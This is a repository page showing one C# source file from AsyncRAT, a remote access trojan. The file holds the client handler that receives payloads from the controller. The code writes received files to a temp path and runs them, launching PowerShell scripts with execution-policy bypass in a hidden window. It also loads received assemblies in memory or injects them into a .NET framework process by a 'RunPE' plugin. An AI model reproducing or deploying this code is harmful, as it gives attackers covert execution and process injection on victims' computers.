Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
AsyncRAT-C-Sharp/AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs
NYAN CAT b96daccc0b support ps1 files
2019-09-15 15:53:00 +03:00

90 lines
3.4 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using Client.MessagePack;
namespace Client.Handle_Packet
{
public class HandleSendTo
{
public void SendToDisk(MsgPack unpack_msgpack)
{
try
{
//Drop To Disk
string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
if (unpack_msgpack.ForcePathObject("Extension").AsString.ToLower().EndsWith(".ps1"))
Process.Start(new ProcessStartInfo { FileName = "powershell", Arguments = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" + fullPath + "\"", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden });
else
Process.Start(fullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
new HandleUninstall();
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void SendToMemory(MsgPack unpack_msgpack)
{
try
{
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
if (injection.Length == 0)
{
//Reflection
new Thread(delegate ()
{
try
{
Assembly loader = Assembly.Load(buffer);
object[] parm = null;
if (loader.EntryPoint.GetParameters().Length > 0)
{
parm = new object[] { new string[] { null } };
}
loader.EntryPoint.Invoke(null, parm);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{ IsBackground = true }.Start();
}
else
{
//RunPE
new Thread(delegate ()
{
try
{
Assembly loader = Assembly.Load(plugin);
MethodInfo meth = loader.GetType("Plugin.Plugin").GetMethod("Initialize");
meth.Invoke(null, new object[] { buffer, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection) });
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{ IsBackground = true }.Start();
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink